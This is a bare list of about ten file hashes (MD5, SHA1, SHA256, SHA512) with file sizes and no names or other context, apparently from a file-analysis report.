MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize 1KB
MD5 b2f8b5bf54e10ae4d93a2eac002cb497
SHA1 eccc3cd33596075bf413e4249c1f2491b1b2a6c7
SHA256 44e6afcd4b56b7cbc81c4ce55e62b7ae6f8d44948f2b9cc9a6ee9a9adfdce02d
SHA512 58c5911a9b98b94909e627f498f839a55383aa213afd9a837ed1f8543198a79a856baa02373f948bfbb0cfd149e7962e2356cdad6695dc6411840faa09700686
-
Filesize 944B
MD5 05b3cd21c1ec02f04caba773186ee8d0
SHA1 39e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256 911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512 e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
Filesize 948B
MD5 87ebe221d639e66210ef10c93e5f83c3
SHA1 483a666b82f7b59e2d569f6f331fa3989fe0f526
SHA256 9a41c90023823aa68dc48f5d8592910dc2ad1116bf54870a0832aba787990380
SHA512 2a1e22894388a79526f39db4fa7c65db92626719337f865eaac39d0bb28dc95726fba62c1f0d659864843a2804bd803fe3dfbc0840421c80ff735192928efcce
-
Filesize 1KB
MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
-
Filesize 578KB
MD5 1984de1def2a649295eb4683cef7b145
SHA1 b3772c1d98f1d18bafd8cf4781f65fc17f20811a
SHA256 ad1ca0ede87c65ab25cca6d7899da474b27ee5631e55c21120e857d16b9802b2
SHA512 8b64bec1f124bfe5df9e3b8f7fcae5921836604c67e537445c48bcc2b7ac0b71d00fc7c8f8609799577bce4cdf24bed38eb0c23bb537881c74216f416a665a65
-
Filesize 7.9MB
MD5 754c5ad19cb3bc21a58bccf028bc2b86
SHA1 66fe0f66d80023b347707248abe6e44e5f9d98ce
SHA256 8445e6223a5f1b7f33b0320560b34139ab758006ed4492f581e2b90d3e104f5b
SHA512 fdbbfbc10c58e909da664e643bffbe640b4b3242df0da2d5bd40d9691f96ce6cca4c27e166dff7e290b3a5f012b0a3e135e1650bf61a7484253c59cc54177790
-
Filesize 230KB
MD5 9e9bbff99af7ac67d8bd79f854bd569c
SHA1 cce432ed7fc4aa23daf8311e2ef3ea2f056c1ca6
SHA256 e0465af4219a63f50e3a44f579d27dc9a0188797faf7f614b5f2ecc1d899a24c
SHA512 7b70e1cd5b900aa16894c5cd13925f799d59e11fc3113adeeaf4d770e27b4088546f8e21c674d3aed3c13ccc06c04c22a2d54c8286dda28fee77fd0fd1a870b8
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 136KB
MD5 16e5a492c9c6ae34c59683be9c51fa31
SHA1 97031b41f5c56f371c28ae0d62a2df7d585adaba
SHA256 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA512 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6